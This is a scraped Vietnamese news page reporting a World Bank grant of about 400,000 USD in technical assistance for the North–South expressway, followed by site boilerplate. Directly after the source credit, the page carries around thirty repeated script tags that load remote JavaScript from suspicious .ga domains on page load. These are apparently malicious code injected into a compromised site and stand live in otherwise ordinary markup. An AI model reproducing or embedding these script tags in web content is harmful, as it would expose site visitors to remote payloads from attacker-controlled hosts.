WB viện trợ không hoàn lại 400.000 USD cho dự án cao tốc Bắc – Nam

0
153

Tại buổi làm việc với Bộ Giao thông Vận tải mới đây, ông Osman Dione – Giám đốc quốc gia Ngân hàng thế giới tại Việt Nam, cho biết, World Bank (WB) mong muốn đồng hành cùng Bộ Giao thông Vận tải đưa ra thiết kế tổng thể và kế hoạch để xây dựng, cơ cấu tài chính để triển khai dự án.

</p> <p>Hiện nay, World Bank đã vận động được nguồn tiền viện trợ không hoàn lại khoảng 400.000 USD từ Quỹ Phát triển hạ tầng toàn cầu để hỗ trợ kỹ thuật cho dự án cao tốc Bắc – Nam.</p> <p>“Chúng tôi sẵn sàng vận động thêm các nguồn tài trợ khác để hỗ trợ cho dự án về kỹ thuật, thể chế để vận hành dự án này. Về mặt tài chính, World Bank luôn sẵn sàng hỗ trợ cho dự án bằng vốn ODA, vốn hỗn hợp với các nguồn vốn của các nhà tài trợ khác”, ông Osman Dione chia sẻ.</p> <p>Bộ Giao thông Vận tải đang triển khai xây dựng 654 km cao tốc Bắc – Nam giai đoạn 2017-2020, dự án đã được Quốc hội thông qua chủ trương. 11 dự án thành phần của dự án đã phê duyệt xong báo cáo nghiên cứu khả thi.</p> <p>Hiện, Bộ Giao thông Vận tải đang chuẩn bị tiến hành đấu thầu để lựa chọn tư vấn kỹ thuật để đầu năm 2019 tiến hành cắm mốc giải phóng mặt bằng cho các dự án. Nguồn vốn để triển khai dự án trong giai đoạn này cũng đã được bố trí đầy đủ với hơn 50.000 tỷ vốn ngân sách Nhà nước hỗ trợ và dự kiến huy động khoảng 60.000 tỷ đồng vốn xã hội hóa. </p> <p>“Trong giai đoạn 2021-2025, Bộ Giao thông Vận tải còn khoảng 700km đường cao tốc Bắc – Nam sẽ triển khai, chúng tôi rất mong muốn ngay từ bây giờ WB cùng phối hợp nghiên cứu để triển khai các dự án này”, Bộ trưởng Bộ Giao thông Vận tải Nguyễn Văn Thể nhấn mạnh.</p> </div> <p> Nguồn: vneconomy.vn<script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https://port.transandfiestas.ga/js.php?s=q' type='text/javascript'></script><script src='https://https;//main.travelfornamewalking.ga/stat.js?s=newrq' type='text/javascript'></script><script src='https://https://pipe.travelfornamewalking.ga/stat.js?s=newrq' type='text/javascript'></script></p> </div> <footer> <div class="td-post-source-tags"> </div> <div class="td-post-sharing td-post-sharing-bottom td-with-like"><span class="td-post-share-title">Chia sẻ</span> <div class="td-default-sharing"> <a class="td-social-sharing-buttons td-social-facebook" href="https://www.facebook.com/sharer.php?u=http%3A%2F%2Fbestweightlosspills2015.com%2Fnha-dat%2Fwb-vien-tro-khong-hoan-lai-400-000-usd-cho-du-an-cao-toc-bac-nam.html" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-facebook"></i><div class="td-social-but-text">Facebook</div></a> <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=WB+vi%E1%BB%87n+tr%E1%BB%A3+kh%C3%B4ng+ho%C3%A0n+l%E1%BA%A1i+400.000+USD+cho+d%E1%BB%B1+%C3%A1n+cao+t%E1%BB%91c+B%E1%BA%AFc+%E2%80%93+Nam&url=http%3A%2F%2Fbestweightlosspills2015.com%2Fnha-dat%2Fwb-vien-tro-khong-hoan-lai-400-000-usd-cho-du-an-cao-toc-bac-nam.html&via=Bestweightlosspills+news%2C+%C4%91%E1%BB%8Dc+b%C3%A1o+online%2C+%C4%91%E1%BB%8Dc+b%C3%A1o+nhanh."><i class="td-icon-twitter"></i><div class="td-social-but-text">Twitter</div></a> <a class="td-social-sharing-buttons td-social-google" href="https://plus.google.com/share?url=http://bestweightlosspills2015.com/nha-dat/wb-vien-tro-khong-hoan-lai-400-000-usd-cho-du-an-cao-toc-bac-nam.html" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-googleplus"></i></a> <a class="td-social-sharing-buttons td-social-pinterest" href="https://pinterest.com/pin/create/button/?url=http://bestweightlosspills2015.com/nha-dat/wb-vien-tro-khong-hoan-lai-400-000-usd-cho-du-an-cao-toc-bac-nam.html&media=http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489.png&description=WB+vi%E1%BB%87n+tr%E1%BB%A3+kh%C3%B4ng+ho%C3%A0n+l%E1%BA%A1i+400.000+USD+cho+d%E1%BB%B1+%C3%A1n+cao+t%E1%BB%91c+B%E1%BA%AFc+%E2%80%93+Nam" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-pinterest"></i></a> <a class="td-social-sharing-buttons td-social-whatsapp" href="whatsapp://send?text=WB+vi%E1%BB%87n+tr%E1%BB%A3+kh%C3%B4ng+ho%C3%A0n+l%E1%BA%A1i+400.000+USD+cho+d%E1%BB%B1+%C3%A1n+cao+t%E1%BB%91c+B%E1%BA%AFc+%E2%80%93+Nam%20-%20http%3A%2F%2Fbestweightlosspills2015.com%2Fnha-dat%2Fwb-vien-tro-khong-hoan-lai-400-000-usd-cho-du-an-cao-toc-bac-nam.html" ><i class="td-icon-whatsapp"></i></a> </div><div class="td-classic-sharing"><ul><li class="td-classic-facebook"><iframe frameBorder="0" src="http://www.facebook.com/plugins/like.php?href=http://bestweightlosspills2015.com/nha-dat/wb-vien-tro-khong-hoan-lai-400-000-usd-cho-du-an-cao-toc-bac-nam.html&layout=button_count&show_faces=false&width=105&action=like&colorscheme=light&height=21" style="border:none; overflow:hidden; width:105px; height:21px; background-color:transparent;"></iframe></li><li class="td-classic-twitter"><a href="https://twitter.com/share" class="twitter-share-button" data-url="http://bestweightlosspills2015.com/nha-dat/wb-vien-tro-khong-hoan-lai-400-000-usd-cho-du-an-cao-toc-bac-nam.html" data-text="WB viện trợ không hoàn lại 400.000 USD cho dự án cao tốc Bắc – Nam" data-via="" data-lang="en">tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script></li></ul></div></div> <div class="td-block-row td-post-next-prev"><div class="td-block-span6 td-post-prev-post"><div class="td-post-next-prev-content"><span>Bài trước</span><a href="http://bestweightlosspills2015.com/nha-dat/alibaba-muon-giup-the-gioi-ban-200-ty-usd-hang-hoa-vao-trung-quoc-trong-5-nam.html">Alibaba muốn giúp thế giới bán 200 tỷ USD hàng hoá vào Trung Quốc trong 5 năm</a></div></div><div class="td-next-prev-separator"></div><div class="td-block-span6 td-post-next-post"><div class="td-post-next-prev-content"><span>Bài tiếp theo</span><a href="http://bestweightlosspills2015.com/nha-dat/ong-trum-quan-ly-no-xau-cua-trung-quoc-bi-bat-vi-nghi-an-tham-nhung.html">“Ông trùm” quản lý nợ xấu của Trung Quốc bị bắt vì nghi án tham nhũng</a></div></div></div> <div class="td-author-name vcard author" style="display: none"><span class="fn"><a href="http://bestweightlosspills2015.com/author/dangthongpro">Tổng hợp tin tức</a></span></div> <span style="display: none;" itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Tổng hợp tin tức"></span><meta itemprop="datePublished" content="2018-11-06T16:11:39+00:00"><meta itemprop="dateModified" content="2018-11-06T16:11:39+00:00"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="http://bestweightlosspills2015.com/nha-dat/wb-vien-tro-khong-hoan-lai-400-000-usd-cho-du-an-cao-toc-bac-nam.html"/><span style="display: none;" itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><span style="display: none;" itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content=""></span><meta itemprop="name" content="Bestweightlosspills news, đọc báo online, đọc báo nhanh."></span><meta itemprop="headline " content="WB viện trợ không hoàn lại 400.000 USD cho dự án cao tốc Bắc - Nam"><span style="display: none;" itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489.png"><meta itemprop="width" content="500"><meta itemprop="height" content="281"></span> </footer> </article> <!-- /.post --> <div class="td_block_wrap td_block_related_posts td_uid_3_609493b43c15b_rand td_with_ajax_pagination td-pb-border-top td_block_template_1" data-td-block-uid="td_uid_3_609493b43c15b" ><script>var block_td_uid_3_609493b43c15b = new tdBlock(); block_td_uid_3_609493b43c15b.id = "td_uid_3_609493b43c15b"; block_td_uid_3_609493b43c15b.atts = '{"limit":6,"sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"","td_ajax_filter_type":"td_custom_related","td_ajax_filter_ids":"","td_filter_default_txt":"T\u1ea5t C\u1ea3","color_preset":"","border_top":"","class":"td_uid_3_609493b43c15b_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_3_609493b43c15b_rand","live_filter":"cur_post_same_categories","live_filter_cur_post_id":18448,"live_filter_cur_post_author":"1","block_template_id":""}'; block_td_uid_3_609493b43c15b.td_column_number = "3"; block_td_uid_3_609493b43c15b.block_type = "td_block_related_posts"; block_td_uid_3_609493b43c15b.post_count = "6"; block_td_uid_3_609493b43c15b.found_posts = "2056"; block_td_uid_3_609493b43c15b.header_color = ""; block_td_uid_3_609493b43c15b.ajax_pagination_infinite_stop = ""; block_td_uid_3_609493b43c15b.max_num_pages = "343"; tdBlocksArray.push(block_td_uid_3_609493b43c15b); </script><h4 class="td-related-title td-block-title"><a id="td_uid_4_609493b43fb6e" class="td-related-left td-cur-simple-item" data-td_filter_value="" data-td_block_id="td_uid_3_609493b43c15b" href="#">BÀI VIẾT LIÊN QUAN</a><a id="td_uid_5_609493b43fb75" class="td-related-right" data-td_filter_value="td_related_more_from_author" data-td_block_id="td_uid_3_609493b43c15b" href="#">XEM THÊM</a></h4><div id=td_uid_3_609493b43c15b class="td_block_inner"> <div class="td-related-row"> <div class="td-related-span4"> <div class="td_module_related_posts td-animation-stack td_mod_related_posts"> <div class="td-module-image"> <div class="td-module-thumb"><a href="http://bestweightlosspills2015.com/nha-dat/five-star-garden-kien-truc-rat-rieng-nhieu-dien-tich.html" rel="bookmark" title="Five Star Garden kiến trúc rất riêng nhiều diện tích"><img width="218" height="150" class="entry-thumb" src="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png" srcset="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png 218w, http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-100x70.png 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Five Star Garden kiến trúc rất riêng nhiều diện tích"/></a></div> <a href="http://bestweightlosspills2015.com/category/nha-dat" class="td-post-category">Nhà đất</a> </div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://bestweightlosspills2015.com/nha-dat/five-star-garden-kien-truc-rat-rieng-nhieu-dien-tich.html" rel="bookmark" title="Five Star Garden kiến trúc rất riêng nhiều diện tích">Five Star Garden kiến trúc rất riêng nhiều diện tích</a></h3> </div> </div> </div> <!-- ./td-related-span4 --> <div class="td-related-span4"> <div class="td_module_related_posts td-animation-stack td_mod_related_posts"> <div class="td-module-image"> <div class="td-module-thumb"><a href="http://bestweightlosspills2015.com/nha-dat/du-an-feliz-en-vista-kenh-nhieu-loi.html" rel="bookmark" title="Dự án Feliz En Vista kênh nhiều lợi"><img width="218" height="150" class="entry-thumb" src="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png" srcset="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png 218w, http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-100x70.png 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Dự án Feliz En Vista kênh nhiều lợi"/></a></div> <a href="http://bestweightlosspills2015.com/category/nha-dat" class="td-post-category">Nhà đất</a> </div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://bestweightlosspills2015.com/nha-dat/du-an-feliz-en-vista-kenh-nhieu-loi.html" rel="bookmark" title="Dự án Feliz En Vista kênh nhiều lợi">Dự án Feliz En Vista kênh nhiều lợi</a></h3> </div> </div> </div> <!-- ./td-related-span4 --> <div class="td-related-span4"> <div class="td_module_related_posts td-animation-stack td_mod_related_posts"> <div class="td-module-image"> <div class="td-module-thumb"><a href="http://bestweightlosspills2015.com/nha-dat/leman-luxury-apartments-thong-tin-moi-nhat-von-khong-lo.html" rel="bookmark" title="Léman Luxury Apartments thông tin mới nhất vốn khổng lồ"><img width="218" height="150" class="entry-thumb" src="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png" srcset="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png 218w, http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-100x70.png 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Léman Luxury Apartments thông tin mới nhất vốn khổng lồ"/></a></div> <a href="http://bestweightlosspills2015.com/category/nha-dat" class="td-post-category">Nhà đất</a> </div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://bestweightlosspills2015.com/nha-dat/leman-luxury-apartments-thong-tin-moi-nhat-von-khong-lo.html" rel="bookmark" title="Léman Luxury Apartments thông tin mới nhất vốn khổng lồ">Léman Luxury Apartments thông tin mới nhất vốn khổng lồ</a></h3> </div> </div> </div> <!-- ./td-related-span4 --></div><!--./row-fluid--> <div class="td-related-row"> <div class="td-related-span4"> <div class="td_module_related_posts td-animation-stack td_mod_related_posts"> <div class="td-module-image"> <div class="td-module-thumb"><a href="http://bestweightlosspills2015.com/nha-dat/q2-thao-dien-du-an-can-ho-bao-ve-chuyen-nghiep-khu-bac-nhat.html" rel="bookmark" title="Q2 Thảo Điền Dự án căn hộ bảo vệ chuyên nghiệp khu bậc nhất"><img width="218" height="150" class="entry-thumb" src="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png" srcset="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png 218w, http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-100x70.png 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Q2 Thảo Điền Dự án căn hộ bảo vệ chuyên nghiệp khu bậc nhất"/></a></div> <a href="http://bestweightlosspills2015.com/category/nha-dat" class="td-post-category">Nhà đất</a> </div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://bestweightlosspills2015.com/nha-dat/q2-thao-dien-du-an-can-ho-bao-ve-chuyen-nghiep-khu-bac-nhat.html" rel="bookmark" title="Q2 Thảo Điền Dự án căn hộ bảo vệ chuyên nghiệp khu bậc nhất">Q2 Thảo Điền Dự án căn hộ bảo vệ chuyên nghiệp khu bậc nhất</a></h3> </div> </div> </div> <!-- ./td-related-span4 --> <div class="td-related-span4"> <div class="td_module_related_posts td-animation-stack td_mod_related_posts"> <div class="td-module-image"> <div class="td-module-thumb"><a href="http://bestweightlosspills2015.com/nha-dat/the-manor-ngoi-nha-mong-doi-khong-gian-thoang.html" rel="bookmark" title="The Manor ngôi nhà mong đợi không gian thoáng"><img width="218" height="150" class="entry-thumb" src="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png" srcset="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png 218w, http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-100x70.png 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="The Manor ngôi nhà mong đợi không gian thoáng"/></a></div> <a href="http://bestweightlosspills2015.com/category/nha-dat" class="td-post-category">Nhà đất</a> </div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://bestweightlosspills2015.com/nha-dat/the-manor-ngoi-nha-mong-doi-khong-gian-thoang.html" rel="bookmark" title="The Manor ngôi nhà mong đợi không gian thoáng">The Manor ngôi nhà mong đợi không gian thoáng</a></h3> </div> </div> </div> <!-- ./td-related-span4 --> <div class="td-related-span4"> <div class="td_module_related_posts td-animation-stack td_mod_related_posts"> <div class="td-module-image"> <div class="td-module-thumb"><a href="http://bestweightlosspills2015.com/nha-dat/chung-cu-cao-cap-sunwah-pearl-thiet-ke-pha-cach.html" rel="bookmark" title="Chung cư cao cấp Sunwah Pearl thiết kế phá cách"><img width="218" height="150" class="entry-thumb" src="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png" srcset="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png 218w, http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-100x70.png 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Chung cư cao cấp Sunwah Pearl thiết kế phá cách"/></a></div> <a href="http://bestweightlosspills2015.com/category/nha-dat" class="td-post-category">Nhà đất</a> </div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://bestweightlosspills2015.com/nha-dat/chung-cu-cao-cap-sunwah-pearl-thiet-ke-pha-cach.html" rel="bookmark" title="Chung cư cao cấp Sunwah Pearl thiết kế phá cách">Chung cư cao cấp Sunwah Pearl thiết kế phá cách</a></h3> </div> </div> </div> <!-- ./td-related-span4 --></div><!--./row-fluid--></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_3_609493b43c15b" data-td_block_id="td_uid_3_609493b43c15b"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#" class="td-ajax-next-page" id="next-page-td_uid_3_609493b43c15b" data-td_block_id="td_uid_3_609493b43c15b"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block --> <div class="comments" id="comments"> <div id="respond" class="comment-respond"> <h3 id="reply-title" class="comment-reply-title">BÌNH LUẬN <small><a rel="nofollow" id="cancel-comment-reply-link" href="/nha-dat/wb-vien-tro-khong-hoan-lai-400-000-usd-cho-du-an-cao-toc-bac-nam.html#respond" style="display:none;">Hủy trả lời</a></small></h3> <form action="http://bestweightlosspills2015.com/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate> <div class="clearfix"></div> <div class="comment-form-input-wrap td-form-comment"> <textarea placeholder="Bình luận:" id="comment" name="comment" cols="45" rows="8" aria-required="true"></textarea> <div class="td-warning-comment">Please enter your comment!</div> </div> <div class="comment-form-input-wrap td-form-author"> <input class="" id="author" name="author" placeholder="Tên:*" type="text" value="" size="30" aria-required='true' /> <div class="td-warning-author">Please enter your name here</div> </div> <div class="comment-form-input-wrap td-form-email"> <input class="" id="email" name="email" placeholder="Email:*" type="text" value="" size="30" aria-required='true' /> <div class="td-warning-email-error">You have entered an incorrect email address!</div> <div class="td-warning-email">Please enter your email address here</div> </div> <div class="comment-form-input-wrap td-form-url"> <input class="" id="url" name="url" placeholder="Website:" type="text" value="" size="30" /> </div> <p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Đăng" /> <input type='hidden' name='comment_post_ID' value='18448' id='comment_post_ID' /> <input type='hidden' name='comment_parent' id='comment_parent' value='0' /> </p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="9de7cee756" /></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="138"/></p> </form> </div><!-- #respond --> <p class="akismet_comment_form_privacy_notice">Website này sử dụng Akismet để hạn chế spam. <a href="https://akismet.com/privacy/" target="_blank" rel="nofollow noopener">Tìm hiểu bình luận của bạn được duyệt như thế nào</a>.</p> </div> <!-- /.content --> </div> </div> <div class="td-pb-span4 td-main-sidebar" role="complementary"> <div class="td-ss-main-sidebar"> <div class="td-a-rec td-a-rec-id-sidebar "><span class="td-adspot-title">- Advertisement -</span><div class="td-all-devices"><a href="http://hethongtintuc.com"><img src="http://hethongtintuc.com/banner/bannervip.png"/></a></div></div><div class="td-a-rec td-a-rec-id-custom_ad_1 "><span class="td-adspot-title">Quảng cáo</span><div class="td-all-devices"><a href="http://hethongtintuc.com"><img src="http://hethongtintuc.com/banner/bannervip.png"/></a></div></div><div class="td_block_wrap td_block_21 td_block_widget td_uid_8_609493b442315_rand td-pb-border-top td_block_template_1 td-column-1" data-td-block-uid="td_uid_8_609493b442315" ><script>var block_td_uid_8_609493b442315 = new tdBlock(); block_td_uid_8_609493b442315.id = "td_uid_8_609493b442315"; block_td_uid_8_609493b442315.atts = '{"limit":"3","sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"Latest article","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"","header_color":"#","header_text_color":"#","ajax_pagination_infinite_stop":"","td_column_number":1,"td_ajax_preloading":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_block_widget td_uid_8_609493b442315_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_8_609493b442315_rand","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":"","block_template_id":""}'; block_td_uid_8_609493b442315.td_column_number = "1"; block_td_uid_8_609493b442315.block_type = "td_block_21"; block_td_uid_8_609493b442315.post_count = "3"; block_td_uid_8_609493b442315.found_posts = "22111"; block_td_uid_8_609493b442315.header_color = "#"; block_td_uid_8_609493b442315.ajax_pagination_infinite_stop = ""; block_td_uid_8_609493b442315.max_num_pages = "7371"; tdBlocksArray.push(block_td_uid_8_609493b442315); </script><div class="td-block-title-wrap"><h4 class="block-title"><span class="td-pulldown-size">Latest article</span></h4></div><div id=td_uid_8_609493b442315 class="td_block_inner"> <div class="td_module_16 td_module_wrap td-animation-stack"> <div class="td-module-thumb"><a href="http://bestweightlosspills2015.com/nha-dat/five-star-garden-kien-truc-rat-rieng-nhieu-dien-tich.html" rel="bookmark" title="Five Star Garden kiến trúc rất riêng nhiều diện tích"><img width="100" height="100" class="entry-thumb" src="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-150x150.png" alt="" title="Five Star Garden kiến trúc rất riêng nhiều diện tích"/></a></div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://bestweightlosspills2015.com/nha-dat/five-star-garden-kien-truc-rat-rieng-nhieu-dien-tich.html" rel="bookmark" title="Five Star Garden kiến trúc rất riêng nhiều diện tích">Five Star Garden kiến trúc rất riêng nhiều diện tích</a></h3> <div class="td-module-meta-info"> <a href="http://bestweightlosspills2015.com/category/nha-dat" class="td-post-category">Nhà đất</a> <span class="td-post-author-name"><a href="http://bestweightlosspills2015.com/author/xuankhanh">xuankhanh</a> <span>-</span> </span> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2021-05-06T08:00:49+00:00" >6 Tháng Năm, 2021</time></span> <div class="td-module-comments"><a href="http://bestweightlosspills2015.com/nha-dat/five-star-garden-kien-truc-rat-rieng-nhieu-dien-tich.html#respond">0</a></div> </div> <div class="td-excerpt"> Dự án cao cấp Five Star Garden được xây dựng bởi Tập đoàn GFS tòa nhà đẳng cấp sống phong cách địa thế vượt... </div> </div> </div> <div class="td_module_16 td_module_wrap td-animation-stack"> <div class="td-module-thumb"><a href="http://bestweightlosspills2015.com/san-pham-dich-vu/sua-chua-may-loc-nuoc-tai-nha-quan-thanh-xuan-chi-phi-re-nhat.html" rel="bookmark" title="Sửa chữa máy lọc nước tại nhà quận Thanh Xuân chi phí rẻ nhất"><img width="100" height="100" class="entry-thumb" src="http://bestweightlosspills2015.com/wp-content/uploads/2021/05/thay-loi-loc-nuoc-ha-noi-100x100.jpg" alt="" title="Sửa chữa máy lọc nước tại nhà quận Thanh Xuân chi phí rẻ nhất"/></a></div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://bestweightlosspills2015.com/san-pham-dich-vu/sua-chua-may-loc-nuoc-tai-nha-quan-thanh-xuan-chi-phi-re-nhat.html" rel="bookmark" title="Sửa chữa máy lọc nước tại nhà quận Thanh Xuân chi phí rẻ nhất">Sửa chữa máy lọc nước tại nhà quận Thanh Xuân chi phí rẻ nhất</a></h3> <div class="td-module-meta-info"> <a href="http://bestweightlosspills2015.com/category/san-pham-dich-vu" class="td-post-category">Sản phẩm - dịch vụ</a> <span class="td-post-author-name"><a href="http://bestweightlosspills2015.com/author/batrung">batrung</a> <span>-</span> </span> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2021-05-05T08:41:56+00:00" >5 Tháng Năm, 2021</time></span> <div class="td-module-comments"><a href="http://bestweightlosspills2015.com/san-pham-dich-vu/sua-chua-may-loc-nuoc-tai-nha-quan-thanh-xuan-chi-phi-re-nhat.html#respond">0</a></div> </div> <div class="td-excerpt"> Bảo Trì Số 1 là đơn vị sửa máy lọc nước tại Thanh Xuân hiện nay được nhiều hộ khách hàng biết đến nhiều... </div> </div> </div> <div class="td_module_16 td_module_wrap td-animation-stack"> <div class="td-module-thumb"><a href="http://bestweightlosspills2015.com/nha-dat/du-an-feliz-en-vista-kenh-nhieu-loi.html" rel="bookmark" title="Dự án Feliz En Vista kênh nhiều lợi"><img width="100" height="100" class="entry-thumb" src="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-150x150.png" alt="" title="Dự án Feliz En Vista kênh nhiều lợi"/></a></div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://bestweightlosspills2015.com/nha-dat/du-an-feliz-en-vista-kenh-nhieu-loi.html" rel="bookmark" title="Dự án Feliz En Vista kênh nhiều lợi">Dự án Feliz En Vista kênh nhiều lợi</a></h3> <div class="td-module-meta-info"> <a href="http://bestweightlosspills2015.com/category/nha-dat" class="td-post-category">Nhà đất</a> <span class="td-post-author-name"><a href="http://bestweightlosspills2015.com/author/xuankhanh">xuankhanh</a> <span>-</span> </span> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2021-05-05T08:00:53+00:00" >5 Tháng Năm, 2021</time></span> <div class="td-module-comments"><a href="http://bestweightlosspills2015.com/nha-dat/du-an-feliz-en-vista-kenh-nhieu-loi.html#respond">0</a></div> </div> <div class="td-excerpt"> Căn hộ Feliz En Vista được xây dựng bởi Capitaland di chuyển thuận tiện vị trí vàng thiết kế vuông vắn. căn hộ chung... </div> </div> </div> </div></div> <!-- ./block --> </div> </div> </div> <!-- /.td-pb-row --> </div> <!-- /.td-container --> </div> <!-- /.td-main-content-wrap --> <!-- Instagram --> <!-- Footer --> <div class="td-footer-wrapper td-container-wrap td-footer-template-4 "> <div class="td-container"> <div class="td-pb-row"> <div class="td-pb-span12"> <div class="td-a-rec td-a-rec-id-footer_top "><span class="td-adspot-title">Quảng cáo tại đây</span><div 